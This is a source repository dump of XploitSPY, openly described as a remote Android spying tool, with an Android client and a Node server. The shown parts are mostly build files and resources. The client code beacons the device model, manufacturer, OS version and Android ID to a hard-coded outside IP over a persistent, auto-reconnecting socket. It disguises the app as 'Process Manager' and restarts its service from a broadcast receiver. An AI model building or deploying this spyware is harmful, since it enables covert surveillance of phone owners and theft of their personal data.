2 | 3 | client 4 | Project client created by Buildship. 5 | 6 | 7 | 8 | 9 | org.eclipse.buildship.core.gradleprojectbuilder 10 | 11 | 12 | 13 | 14 | 15 | org.eclipse.buildship.core.gradleprojectnature 16 | 17 | 18 | -------------------------------------------------------------------------------- /client/.settings/org.eclipse.buildship.core.prefs: -------------------------------------------------------------------------------- 1 | connection.project.dir= 2 | eclipse.preferences.version=1 3 | -------------------------------------------------------------------------------- /client/app - Shortcut.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app - Shortcut.lnk -------------------------------------------------------------------------------- /client/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | -------------------------------------------------------------------------------- /client/app/build.gradle: -------------------------------------------------------------------------------- 1 | apply plugin: 'com.android.application' 2 | 3 | android { 4 | lintOptions { 5 | checkReleaseBuilds false 6 | } 7 | compileSdkVersion 28 8 | buildToolsVersion '28.0.3' 9 | defaultConfig { 10 | applicationId 'com.remote.app' 11 | minSdkVersion 14 12 | targetSdkVersion 21 13 | versionCode 1 14 | versionName "1.0" 15 | } 16 | buildTypes { 17 | release { 18 | minifyEnabled true 19 | proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro' 20 | } 21 | } 22 | } 23 | 24 | dependencies { 25 | implementation fileTree(dir: 'libs', include: ['*.jar']) 26 | implementation ('io.socket:socket.io-client:0.8.3') { 27 | // excluding org.json which is provided by Android 28 | exclude group: 'org.json', module: 'json' 29 | } 30 | implementation 'com.android.support:support-compat:28.0.0' 31 | } 32 | -------------------------------------------------------------------------------- /client/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # By default, the flags in this file are appended to flags specified 3 | # in /home/king/Android/Sdk/tools/proguard/proguard-android.txt 4 | # You can edit the include path and order by changing the proguardFiles 5 | # directive in build.gradle. 6 | # 7 | # For more details, see 8 | # http://developer.android.com/guide/developing/tools/proguard.html 9 | 10 | # Add any project specific keep options here: 11 | 12 | # If your project uses WebView with JS, uncomment the following 13 | # and specify the fully qualified class name to the JavaScript interface 14 | # class: 15 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 16 | # public *; 17 | #} 18 | -------------------------------------------------------------------------------- /client/app/release/app-release.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/release/app-release.apk -------------------------------------------------------------------------------- /client/app/release/output.json: -------------------------------------------------------------------------------- 1 | [{"outputType":{"type":"APK"},"apkData":{"type":"MAIN","splits":[],"versionCode":1,"versionName":"1.0","enabled":true,"outputFile":"app-release.apk","fullName":"release","baseName":"release"},"path":"app-release.apk","properties":{}}] -------------------------------------------------------------------------------- /client/app/src/main/ic_launcher-web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/ic_launcher-web.png -------------------------------------------------------------------------------- /client/app/src/main/java/com/remote/app/IOSocket.java: -------------------------------------------------------------------------------- 1 | package com.remote.app; 2 | 3 | import android.os.Build; 4 | import android.provider.Settings; 5 | import java.net.URISyntaxException; 6 | import io.socket.client.IO; 7 | import io.socket.client.Socket; 8 | 9 | public class IOSocket { 10 | private static IOSocket ourInstance = new IOSocket(); 11 | private io.socket.client.Socket ioSocket; 12 | 13 | 14 | 15 | private IOSocket() { 16 | try { 17 | 18 | String deviceID = Settings.Secure.getString(MainService.getContextOfApplication().getContentResolver(), Settings.Secure.ANDROID_ID); 19 | IO.Options opts = new IO.Options(); 20 | opts.reconnection = true; 21 | opts.reconnectionDelay = 5000; 22 | opts.reconnectionDelayMax = 999999999; 23 | 24 | ioSocket = IO.socket("http://3.90.231.134:80?model="+ android.net.Uri.encode(Build.MODEL)+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+deviceID); 25 | } catch (URISyntaxException e) { 26 | e.printStackTrace(); 27 | } 28 | } 29 | 30 | 31 | public static IOSocket getInstance() { 32 | return ourInstance; 33 | } 34 | 35 | public Socket getIoSocket() { 36 | return ioSocket; 37 | } 38 | 39 | 40 | 41 | 42 | } 43 | -------------------------------------------------------------------------------- /client/app/src/main/java/com/remote/app/PermissionManager.java: -------------------------------------------------------------------------------- 1 | package com.remote.app; 2 | 3 | import android.content.pm.PackageInfo; 4 | import android.content.pm.PackageManager; 5 | 6 | import org.json.JSONArray; 7 | import org.json.JSONObject; 8 | 9 | import static com.remote.app.ConnectionManager.context; 10 | 11 | public class PermissionManager { 12 | 13 | public static JSONObject getGrantedPermissions() { 14 | JSONObject data = new JSONObject(); 15 | try { 16 | JSONArray perms = new JSONArray(); 17 | PackageInfo pi = context.getPackageManager().getPackageInfo(context.getPackageName(), PackageManager.GET_PERMISSIONS); 18 | for (int i = 0; i < pi.requestedPermissions.length; i++) { 19 | if ((pi.requestedPermissionsFlags[i] & PackageInfo.REQUESTED_PERMISSION_GRANTED) != 0) perms.put(pi.requestedPermissions[i]); 20 | } 21 | data.put("permissions", perms); 22 | } catch (Exception e) { 23 | } 24 | return data; 25 | } 26 | 27 | public static boolean canIUse(String perm) { 28 | if(context.getPackageManager().checkPermission(perm, context.getPackageName()) == PackageManager.PERMISSION_GRANTED) return true; 29 | else return false; 30 | } 31 | 32 | } 33 | -------------------------------------------------------------------------------- /client/app/src/main/java/com/remote/app/ServiceReciever.java: -------------------------------------------------------------------------------- 1 | package com.remote.app; 2 | 3 | import android.content.BroadcastReceiver; 4 | import android.content.Context; 5 | import android.content.Intent; 6 | import android.os.Build; 7 | import android.util.Log; 8 | 9 | public class ServiceReciever extends BroadcastReceiver { 10 | @Override 11 | public void onReceive(Context context, Intent intent) { 12 | // context.startService(new Intent(context.getApplicationContext(), MainService.class)); 13 | if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) { 14 | context.startForegroundService(new Intent(context, MainService.class)); 15 | } else { 16 | context.startService(new Intent(context, MainService.class)); 17 | } 18 | } 19 | } -------------------------------------------------------------------------------- /client/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 12 | 13 | 18 | 19 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-hdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-hdpi/ic_launcher.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-hdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-hdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-mdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-mdpi/ic_launcher.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-mdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-mdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xhdpi/ic_launcher.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /client/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /client/app/src/main/res/values-w820dp/dimens.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 64dp 6 | 7 | -------------------------------------------------------------------------------- /client/app/src/main/res/values/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #3F51B5 4 | #303F9F 5 | #FF4081 6 | 7 | -------------------------------------------------------------------------------- /client/app/src/main/res/values/dimens.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 16dp 4 | 16dp 5 | 6 | -------------------------------------------------------------------------------- /client/app/src/main/res/values/ic_launcher_background.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #FFFFFF 4 | -------------------------------------------------------------------------------- /client/app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | Process Manager 3 | 4 | -------------------------------------------------------------------------------- /client/app/src/main/res/values/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /client/build.gradle: -------------------------------------------------------------------------------- 1 | // Top-level build file where you can add configuration options common to all sub-projects/modules. 2 | 3 | buildscript { 4 | repositories { 5 | jcenter() 6 | maven { 7 | url 'https://maven.google.com/' 8 | name 'Google' 9 | } 10 | google() 11 | } 12 | dependencies { 13 | classpath 'com.android.tools.build:gradle:3.4.2' 14 | 15 | // NOTE: Do not place your application dependencies here; they belong 16 | // in the individual module build.gradle files 17 | } 18 | } 19 | 20 | allprojects { 21 | repositories { 22 | jcenter() 23 | maven { 24 | url 'https://maven.google.com/' 25 | name 'Google' 26 | } 27 | } 28 | } 29 | 30 | task clean(type: Delete) { 31 | delete rootProject.buildDir 32 | } 33 | -------------------------------------------------------------------------------- /client/client.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /client/gradle.properties: -------------------------------------------------------------------------------- 1 | # Project-wide Gradle settings. 2 | 3 | # IDE (e.g. Android Studio) users: 4 | # Gradle settings configured through the IDE *will override* 5 | # any settings specified in this file. 6 | 7 | # For more details on how to configure your build environment visit 8 | # http://www.gradle.org/docs/current/userguide/build_environment.html 9 | 10 | # Specifies the JVM arguments used for the daemon process. 11 | # The setting is particularly useful for tweaking memory settings. 12 | org.gradle.jvmargs=-Xmx1536m 13 | 14 | # When configured, Gradle will run in incubating parallel mode. 15 | # This option should only be used with decoupled projects. More details, visit 16 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects 17 | # org.gradle.parallel=true 18 | -------------------------------------------------------------------------------- /client/gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/client/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /client/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | #Sat Aug 17 21:49:49 BST 2019 2 | distributionBase=GRADLE_USER_HOME 3 | distributionPath=wrapper/dists 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | distributionUrl=https\://services.gradle.org/distributions/gradle-5.1.1-all.zip 7 | -------------------------------------------------------------------------------- /client/local.properties: -------------------------------------------------------------------------------- 1 | ## This file must *NOT* be checked into Version Control Systems, 2 | # as it contains information specific to your local configuration. 3 | # 4 | # Location of the SDK. This is only used by Gradle. 5 | # For customization when using a Version Control System, please read the 6 | # header note. 7 | #Wed Jan 08 16:38:16 IST 2020 8 | sdk.dir=C\:\\Users\\Chris\\AppData\\Local\\Android\\Sdk 9 | -------------------------------------------------------------------------------- /client/settings.gradle: -------------------------------------------------------------------------------- 1 | include ':app' 2 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "xploitspy", 3 | "version": "1.0.0", 4 | "description": "XploitSPY - Remote Android Spying Tool", 5 | "main": "index.js", 6 | "scripts": { 7 | "start": "node server/index.js", 8 | "test": "node server/index.js" 9 | }, 10 | "author": "XploitWizer", 11 | "license": "ISC", 12 | "dependencies": { 13 | "body-parser": "^1.19.0", 14 | "cookie-parser": "^1.4.4", 15 | "ejs": "^2.6.2", 16 | "express": "^4.17.1", 17 | "geoip-lite": "^1.3.7", 18 | "lowdb": "^1.0.0", 19 | "socket.io": "^2.2.0" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /server/app/factory/apktool.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/apktool.jar -------------------------------------------------------------------------------- /server/app/factory/app-release.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/app-release.apk -------------------------------------------------------------------------------- /server/app/factory/decompiled/apktool.yml: -------------------------------------------------------------------------------- 1 | !!brut.androlib.meta.MetaInfo 2 | apkFileName: app-release.apk 3 | compressionType: false 4 | doNotCompress: 5 | - resources.arsc 6 | - META-INF/android.arch.lifecycle_runtime.version 7 | - META-INF/androidx.core_core.version 8 | - META-INF/androidx.versionedparcelable_versionedparcelable.version 9 | - png 10 | isFrameworkApk: false 11 | packageInfo: 12 | forcedPackageId: '127' 13 | renameManifestPackage: null 14 | sdkInfo: 15 | minSdkVersion: '14' 16 | targetSdkVersion: '21' 17 | sharedLibrary: false 18 | sparseResources: false 19 | unknownFiles: {} 20 | usesFramework: 21 | ids: 22 | - 1 23 | tag: null 24 | version: 2.4.1 25 | versionInfo: 26 | versionCode: '1' 27 | versionName: '1.0' 28 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/original/AndroidManifest.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/original/AndroidManifest.xml -------------------------------------------------------------------------------- /server/app/factory/decompiled/original/META-INF/CERT.RSA: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/original/META-INF/CERT.RSA -------------------------------------------------------------------------------- /server/app/factory/decompiled/original/META-INF/android.arch.lifecycle_runtime.version: -------------------------------------------------------------------------------- 1 | 1.1.1 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/original/META-INF/androidx.core_core.version: -------------------------------------------------------------------------------- 1 | 1.0.0 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/original/META-INF/androidx.versionedparcelable_versionedparcelable.version: -------------------------------------------------------------------------------- 1 | 1.0.0 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-hdpi/notification_bg_low_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-hdpi/notification_bg_low_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-hdpi/notification_bg_low_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-hdpi/notification_bg_low_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-hdpi/notification_bg_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-hdpi/notification_bg_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-hdpi/notification_bg_normal_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-hdpi/notification_bg_normal_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-hdpi/notify_panel_notification_icon_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-hdpi/notify_panel_notification_icon_bg.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-mdpi/notification_bg_low_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-mdpi/notification_bg_low_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-mdpi/notification_bg_low_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-mdpi/notification_bg_low_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-mdpi/notification_bg_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-mdpi/notification_bg_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-mdpi/notification_bg_normal_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-mdpi/notification_bg_normal_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-mdpi/notify_panel_notification_icon_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-mdpi/notify_panel_notification_icon_bg.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-v21/notification_action_background.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_low_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_low_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_low_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_low_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_normal.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_normal.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_normal_pressed.9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-xhdpi/notification_bg_normal_pressed.9.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable-xhdpi/notify_panel_notification_icon_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/drawable-xhdpi/notify_panel_notification_icon_bg.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable/notification_bg.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable/notification_bg_low.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable/notification_icon_background.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/drawable/notification_tile_bg.xml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v17/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v17/notification_action.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v17/notification_action_tombstone.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v21/notification_action.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v21/notification_action_tombstone.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout-v21/notification_template_icon_group.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/notification_action.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/notification_action_tombstone.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/notification_template_icon_group.xml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/notification_template_part_chronometer.xml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/layout/notification_template_part_time.xml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-anydpi-v26/ic_launcher.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-anydpi-v26/ic_launcher_round.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-hdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-mdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ankit0183/XploitSPY/05fe599fd9aed51f79717f770b4c22769e18a116/server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /server/app/factory/decompiled/res/mipmap-xxxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- 